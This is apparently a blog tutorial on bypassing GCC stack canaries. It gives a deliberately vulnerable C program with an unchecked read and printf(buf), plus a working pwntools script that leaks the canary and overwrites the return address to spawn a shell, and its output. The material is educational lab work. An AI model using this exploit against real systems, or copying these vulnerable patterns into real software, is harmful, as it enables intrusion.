Stack Canaries

Sidestepping a buffer overflow mitigation to gain control of execution

Intro

Lately I've been exploring binary exploitation techniques. To get my feet wet, I decided to tackle the buffer overflow, perhaps the most well-known exploit in software security.

The idea is as follows: if we are reading data into a stack variable, and the length of this data exceeds the size of the variable, we can write past the variable and overwrite other stuff on the stack.

Why does this matter? Well, if we keep writing data, overflowing the buffer, eventually we'll reach the return address, which was placed on the stack by an earlier call instruction. If we can overwrite this return address with an address of our choosing, we can gain control over the execution of the program.

Of course, this exploit requires that the application software is poorly written from a security perspective, and does not perform any length checking of the input data against the size of the buffer.

The Stack

The stack canary lives between the local variables and the return address. The caller's call instruction pushes the return address onto the stack, while the callee pushes the previous frame pointer, as well as any callee-saved registers and any padding required for proper stack alignment. The exact number of bytes between the stack canary and the return address will vary depending on architecture and compiler options.

The compiler will insert the canary between the local variables and the return address in order to protect the return address from corruption in case of an accidental overflow. The compiler will also insert logic into the binary that verifies the canary value hasn't changed before returning.
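To make the layout concrete, here is a minimal Python sketch that models a stack frame as a flat byte array. It is only a model, not real process memory: the canary value, the return address, and the 12-byte gap between them are made-up constants chosen for illustration (the real gap depends on the build), and `unchecked_read` is a hypothetical stand-in for a `read()` call with no length check.

```python
import struct

BUF_SIZE = 100            # size of the local buffer
GAP = 12                  # assumed bytes between canary and return address
CANARY = 0xDEADBE00       # made-up canary value
RET_ADDR = 0x08049280     # made-up return address


def build_frame() -> bytearray:
    """Lay out a model frame: buf | canary | gap | return address."""
    frame = bytearray(BUF_SIZE)
    frame += struct.pack("<I", CANARY)
    frame += bytes(GAP)
    frame += struct.pack("<I", RET_ADDR)
    return frame


def unchecked_read(frame: bytearray, data: bytes) -> None:
    """Copy data to the start of the frame without checking it against BUF_SIZE."""
    n = min(len(data), len(frame))
    frame[:n] = data[:n]


def canary_intact(frame: bytearray) -> bool:
    (value,) = struct.unpack_from("<I", frame, BUF_SIZE)
    return value == CANARY


def return_address(frame: bytearray) -> int:
    (value,) = struct.unpack_from("<I", frame, BUF_SIZE + 4 + GAP)
    return value


safe = build_frame()
unchecked_read(safe, b"A" * 100)      # fits in buf: nothing else is touched

smashed = build_frame()
unchecked_read(smashed, b"A" * 120)   # runs over the canary and the return address

print(canary_intact(safe), hex(return_address(safe)))
print(canary_intact(smashed), hex(return_address(smashed)))
```

The second write clobbers the return address, but it cannot get there without trampling the canary first, which is exactly what the compiler-inserted check relies on.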

Let's get started with an example.

defeat_canary.c

#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>

void shell() {
	system("/bin/sh");
}

void vulnerable_fn() {
	char buf[100];

	read(STDIN_FILENO, buf, 200); 
	printf(buf);
}

int main() {
	setbuf(stdin, NULL); 
	setbuf(stdout, NULL);

	printf("Hello World! A buffer overflow opportunity is waiting to be exploited.\n");
	printf("Input: ");
	vulnerable_fn();
}

Here we have a stack smashing opportunity: we are reading 200 bytes from stdin, the size of buf is only 100 bytes, and we are not doing any length checking of our input.

Compile defeat_canary.c for 32-bit and without position independence. 32-bit is chosen for convenience; later I will talk about why position independent executables make it more difficult to perform this exploit.

gcc -m32 -no-pie defeat_canary.c -o defeat_canary

By reading more data from stdin into buf than its size, we can see the stack protection features of GCC in action (here I am inputting 200 bytes).

$ ./defeat_canary
Hello World! A buffer overflow opportunity is waiting to be exploited.
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtB!��
*** stack smashing detected ***: terminated
Aborted (core dumped)

If we write past the end of buf, the canary check fails and we end up in __stack_chk_fail(), which prints the message above and aborts the program. __stack_chk_fail() is a function that lives in libc; GCC inserts the call to it into the binary during compilation.

Alas, since we corrupted the stack canary by overflowing buf, we get kicked out. With a little more knowledge, we can get away with our buffer overflow attack by tricking the program into thinking everything's okay.

Analyzing the Disassembly

In the disassembly for vulnerable_fn(), we see that soon after function entry, the stack canary is placed on the stack at $ebp-0xc. Without diving too deeply into segment registers and the Global Descriptor Table (GDT), the stack canary is loaded from a 0x14-byte offset from $gs_base, which points at the current thread's Thread Local Storage (TLS). This is because glibc stores the canary in each thread's thread control block: every thread has its own copy, although threads created within a process inherit the same value (see glibc/sysdeps/i386/nptl/tls.h if you're curious).

Then $eax is cleared by an XOR with itself; I believe this is to keep the canary from leaking through $eax later on.

080491f1 <vulnerable_fn>:
 ...
 8049203:	65 a1 14 00 00 00    	mov    %gs:0x14,%eax
 8049209:	89 45 f4             	mov    %eax,-0xc(%ebp)
 804920c:	31 c0                	xor    %eax,%eax
 ...

Later, we can see that before returning from vulnerable_fn(), the stack canary gets checked. If it does not equal the four bytes at $gs:0x14, we end up in __stack_chk_fail_local() (a small local wrapper from glibc that calls __stack_chk_fail()).

080491f1 <vulnerable_fn>:
...
8049234:	8b 45 f4             	mov    -0xc(%ebp),%eax
8049237:	65 2b 05 14 00 00 00 	sub    %gs:0x14,%eax
804923e:	74 05                	je     8049245 <vulnerable_fn+0x54>
8049240:	e8 8b 00 00 00       	call   80492d0 <__stack_chk_fail_local>
...
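The two snippets above boil down to "save a copy on entry, compare on exit". As a rough model only, the sketch below mimics that flow in Python. `TLS_CANARY` stands in for the value at `%gs:0x14`, and `call_with_canary`, `StackSmashingDetected`, and the dictionary used as a "frame" are all hypothetical names invented for this illustration.

```python
import os
import struct

# Stand-in for the per-thread value at %gs:0x14 (low byte cleared, as glibc does).
TLS_CANARY = struct.unpack("<I", os.urandom(4))[0] & 0xFFFFFF00


class StackSmashingDetected(Exception):
    """Models the abort performed by __stack_chk_fail()."""


def call_with_canary(body):
    """Run body(frame) between a simulated prologue and epilogue."""
    # Prologue: mov %gs:0x14,%eax ; mov %eax,-0xc(%ebp)
    frame = {"canary": TLS_CANARY}

    body(frame)  # the function body, which may or may not corrupt the frame

    # Epilogue: mov -0xc(%ebp),%eax ; sub %gs:0x14,%eax ; je <return>
    if frame["canary"] - TLS_CANARY != 0:
        raise StackSmashingDetected("*** stack smashing detected ***")
    return "returned normally"


def well_behaved(frame):
    pass  # never touches the canary


def overflowing(frame):
    frame["canary"] ^= 0x41  # simulate an overflow changing the saved copy


print(call_with_canary(well_behaved))
try:
    call_with_canary(overflowing)
except StackSmashingDetected as exc:
    print(exc)
```

Note that the check only cares whether the saved copy still matches the reference value. It has no idea what happened in between, which is the gap we are about to exploit.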

So, how do we get around this? We want to write past buf and overwrite the return address, but the stack canary is getting in our way. Sad times.

But do not fret! If we craft our input wisely, we can overflow the buffer in such a way that we can overwrite the return address AND preserve the stack canary value. Win-Win. Of course, this requires that we know the stack canary value before we craft our input.

Maybe glibc can tell us how the stack canary is born into our program's memory.

Initializing the Canary

// glibc/csu/libc-start.c
STATIC int LIBC_START_MAIN (...)
{
...
  /* Set up the stack checker's canary.  */
  uintptr_t stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);
# ifdef THREAD_SET_STACK_GUARD
  THREAD_SET_STACK_GUARD (stack_chk_guard);
# else
  __stack_chk_guard = stack_chk_guard;
# endif
...
}

// glibc/sysdeps/unix/sysv/linux/dl-osinfo.h
static inline uintptr_t __attribute__ ((always_inline))
_dl_setup_stack_chk_guard (void *dl_random)
{
  union
  {
    uintptr_t num;
    unsigned char bytes[sizeof (uintptr_t)];
  } ret;

  /* We need in the moment only 8 bytes on 32-bit platforms and 16
     bytes on 64-bit platforms.  Therefore we can use the data
     directly and not use the kernel-provided data to seed a PRNG.  */
  memcpy (ret.bytes, dl_random, sizeof (ret));
#if BYTE_ORDER == LITTLE_ENDIAN
  ret.num &= ~(uintptr_t) 0xff;
#elif BYTE_ORDER == BIG_ENDIAN
  ret.num &= ~((uintptr_t) 0xff << (8 * (sizeof (ret) - 1)));
#else
# error "BYTE_ORDER unknown"
#endif
  return ret.num;
}

Looking at this snippet from glibc, we can see some of the calls that help to set up the canary. It turns out that _dl_random points to 16 random bytes that the kernel's binary loader generates and passes up to user space via the auxiliary vector (the AT_RANDOM entry), which is a container of information about the OS environment that the kernel gives to user space programs on entry.

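It should also be noted that the least significant byte of the canary is cleared to 0x00. On a little-endian machine such as x86, this is the first byte of the canary in memory, the one sitting right after the local variables. A string that runs right up against the canary is therefore still null-terminated, so string functions stop there instead of leaking the canary and the rest of the stack. This tidbit is crucial and will come into play very soon.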
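As a sanity check on the masking logic, here is a small Python re-creation of what `_dl_setup_stack_chk_guard` does with the random bytes. This is a sketch, not glibc's code: the function name `setup_stack_chk_guard`, its parameters, and the fixed sample bytes are illustrative assumptions, and `os.urandom` merely stands in for the kernel-provided random data.

```python
import os


def setup_stack_chk_guard(dl_random: bytes, word_size: int = 4,
                          byteorder: str = "little") -> int:
    """Take the first word of the random data and clear one byte of it."""
    num = int.from_bytes(dl_random[:word_size], byteorder)
    mask = (1 << (8 * word_size)) - 1
    if byteorder == "little":
        # Little-endian: clear the least significant byte.
        num &= ~0xFF & mask
    else:
        # Big-endian: clear the most significant byte.
        num &= ~(0xFF << (8 * (word_size - 1))) & mask
    return num


# Fixed sample input so the result is easy to follow by hand.
sample = bytes.fromhex("11223344556677889900aabbccddeeff")

le = setup_stack_chk_guard(sample, 4, "little")
be = setup_stack_chk_guard(sample, 4, "big")
print(hex(le), le.to_bytes(4, "little").hex())
print(hex(be), be.to_bytes(4, "big").hex())

# With real random input the cleared byte is still always zero.
random_guard = setup_stack_chk_guard(os.urandom(16))
print(hex(random_guard))
```

The two branches clear different bytes of the number, but in both cases the zero lands at the lowest address in memory, right where an overflowing string would first touch the canary.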

So, the canary is a random number generated for each process at startup. How can we know the canary value in advance, and without debug access?

Leaking the Canary

For the purposes of this demonstration, we're going to add some code to vulnerable_fn() which will allow us to leak the canary so that we can use it to construct the input that will give us control over the execution.

It's just an extra call to read(). The first read() will allow us to leak the canary; the second will allow us to perform our exploit successfully.

// defeat_canary.c
...
void vulnerable_fn() {
	char buf[100];
	for (int i = 0; i < 2; ++i) {
		read(STDIN_FILENO, buf, 200); 
		printf(buf);
	}
}
...

We will use a Python script that leverages pwntools to perform I/O with the application, as inputting hundreds of bytes manually is (a bit) tedious.

defeat_canary.py

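#!/usr/bin/env python
from pwn import *

# Load the binary once; setting context.binary also selects the architecture.
elf = context.binary = ELF('./defeat_canary')
io = process('./defeat_canary')
shellfn = elf.sym["shell"]

io.recvuntil(b'Input: ')

# Stage 1: fill buf so the trailing line feed lands on the canary's null byte.
payload = b'A' * 100
io.sendline(payload) # Adds a line feed character (0xa) in addition to payload
io.recvuntil(b'A' * 100)

# The next 4 bytes are the line feed followed by the canary's other three bytes.
canary = u32(io.recvn(4)) - 0xa
log.info("Canary:" + hex(canary))

# Stage 2: refill buf, restore the canary, pad, then overwrite the return address.
payload = (b'\x90' * 100) + p32(canary) + (b'\x90' * 12) + p32(shellfn)
io.send(payload)
io.recv()
io.interactive()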

The first payload we send really contains 101 bytes: 100 'A's and 1 line feed character. This line feed character is critical; it overwrites the first byte of the canary (the 0x00 byte), which means our buf is no longer null-terminated. As a result, our call to printf() leaks the remaining three bytes of the canary (and possibly more; printf() will continue writing to stdout until it reaches a null terminator). Corrupting the canary at this point is harmless, because it is only checked when vulnerable_fn() returns, and by then the second payload will have restored it.

Reading another 4 bytes after our known initial payload gives us the canary value with 0xa in place of its low byte, courtesy of the line feed character appended by io.sendline(). Since that byte is always 0x00, subtracting 0xa gives us the true canary value.

We saw earlier that our canary value was placed on the stack at $ebp-0xc, so it occupies the four bytes up to $ebp-0x8. The return address is located at $ebp+0x4, so after writing the canary we need another 0xc bytes of padding (covering the bytes up to $ebp plus the saved frame pointer) to reach it.
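The arithmetic is easy to verify offline. The sketch below replays the leak on a fake stack using only the standard library. `simulated_printf` is a hypothetical helper that models just one property of `printf()`, namely that output stops at the first null byte, and the canary value is the one logged in this post's sample run; the 12 zero bytes after the canary are an assumption made so the model output ends there.

```python
import struct


def simulated_printf(memory: bytes) -> bytes:
    """Return what a string print would emit: everything before the first NUL."""
    return memory.split(b"\x00", 1)[0]


def recover_canary(leaked: bytes) -> int:
    """Undo the line feed that replaced the canary's low (always zero) byte."""
    return struct.unpack("<I", leaked)[0] - 0x0A


true_canary = 0xF78B8700

# Model stack: 100-byte buf, the canary, then zeroed bytes (an assumption).
stack = bytearray(100) + struct.pack("<I", true_canary) + bytes(12)

# First payload: 100 'A's plus the line feed that sendline() appends.
first_payload = b"A" * 100 + b"\n"
stack[:len(first_payload)] = first_payload

output = simulated_printf(bytes(stack))
leaked = output[100:104]          # the 4 bytes right after our 100 'A's

print(leaked.hex())
print(hex(recover_canary(leaked)))
```

Without the line feed, the print would have stopped at the canary's null byte and revealed nothing past the 100 'A's.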

The final payload is then composed of:

100 bytes to fill up buf
The canary value we leaked earlier
12 bytes of padding
The address of shell(), which, when vulnerable_fn() returns, will grant us shell access
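The layout above can be double-checked without pwntools. This is a minimal sketch using `struct.pack` in place of `p32()`; the `build_payload` helper is hypothetical, and the address used for `shell()` is a made-up placeholder rather than the real symbol address.

```python
import struct


def build_payload(canary: int, target: int, buf_size: int = 100,
                  gap: int = 12, filler: bytes = b"\x90") -> bytes:
    """buf filler | canary | gap filler | new return address (little-endian)."""
    return (filler * buf_size
            + struct.pack("<I", canary)
            + filler * gap
            + struct.pack("<I", target))


canary = 0xF78B8700          # value from this post's sample run
shell_addr = 0x080491D6      # placeholder address, for illustration only

payload = build_payload(canary, shell_addr)

print(len(payload))                       # total bytes sent
print(payload[100:104].hex())             # canary, low byte first
print(payload[116:120].hex())             # new return address
```

At 120 bytes the payload fits comfortably inside the 200 bytes that read() is willing to accept, and the canary's null byte is written back at offset 100, so the check at function exit passes.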

Running this script, we are able to achieve control of execution and thus gain shell access:

$ python defeat_canary.py
[*] '~/defeat_canary'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Starting local process './defeat_canary': pid 145887
[*] Canary:0xf78b8700
[*] Switching to interactive mode
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90$ 
$ whoami
matt

Conclusion

As you can see, the stack canary is a form of binary protection that can be fairly easily bypassed when the program leaks its value and additional protections such as ASLR and PIE are absent. Maintaining the legitimacy of the stack is a key aspect of software security, as proper control flow requires that the contents of the stack (especially return addresses) cannot be corrupted by malicious or otherwise negligent means.

Notes

Why doesn't this work without the "-no-pie" compiler option?

The location of position independent code is decided at load time rather than at link time. Typically this is combined with Address Space Layout Randomization (ASLR) so that a random base address is chosen for the executable and its dependencies every time they are loaded into memory.

This makes it harder to gain execution control from a buffer overflow because we are unable to know the runtime address of our shell() function (or any function we intend to direct execution to), so we wouldn't know exactly how to craft our exploit payload.

In fact, we can compile defeat_canary.c without -no-pie and see that the address of a function in the ELF file is just an offset from the load base (vulnerable_fn() is shown here; the same holds for shell()).

$ gcc -m32 defeat_canary.c -o defeat_canary
$ readelf -s defeat_canary | grep vulnerable_fn
    28: 00001218   108 FUNC    GLOBAL DEFAULT   14 vulnerable_fn
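To see why an offset alone is not enough, here is a small sketch of the address arithmetic. The offset is the one from the readelf output above; the load bases are hypothetical values invented for illustration, since the real base changes from run to run under ASLR.

```python
SYMBOL_OFFSET = 0x1218   # vulnerable_fn's value from the readelf output


def runtime_address(load_base: int, offset: int) -> int:
    """Where the symbol ends up once the image is mapped at load_base."""
    return load_base + offset


def recover_base(leaked_address: int, offset: int) -> int:
    """Given one leaked runtime address of a known symbol, recover the base."""
    return leaked_address - offset


# Hypothetical page-aligned bases, standing in for three separate runs.
example_bases = [0x56555000, 0x565A3000, 0x5663F000]

for base in example_bases:
    print(hex(base), "->", hex(runtime_address(base, SYMBOL_OFFSET)))

leak = runtime_address(example_bases[1], SYMBOL_OFFSET)
print(hex(recover_base(leak, SYMBOL_OFFSET)))
```

The target address differs on every run, so a hard-coded return address no longer works. The second helper hints at the usual way around this: a single leaked code pointer is enough to recover the base, just as a single leak was enough to recover the canary.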

fstack-protector

-fstack-protector is one of the instrumentation options GCC offers. From the GCC docs:

-fstack-protector

Emit extra code to check for buffer overflows, such as stack smashing attacks. 
This is done by adding a guard variable to functions with vulnerable objects. This 
includes functions that call alloca, and functions with buffers larger than or equal 
to 8 bytes. The guards are initialized when a function is entered and then checked 
when the function exits. If a guard check fails, an error message is printed and 
the program exits. Only variables that are actually allocated on the stack are 
considered, optimized away variables or variables allocated in registers don’t count.

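Depending on your Linux distribution, GCC may have been configured to enable this (or a stronger variant such as -fstack-protector-strong) by default. This is the option that tells GCC to instrument your binary with the stack canary and its checking logic, which calls into glibc's __stack_chk_fail() on failure.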

CC-BY-NC-SA 4.0
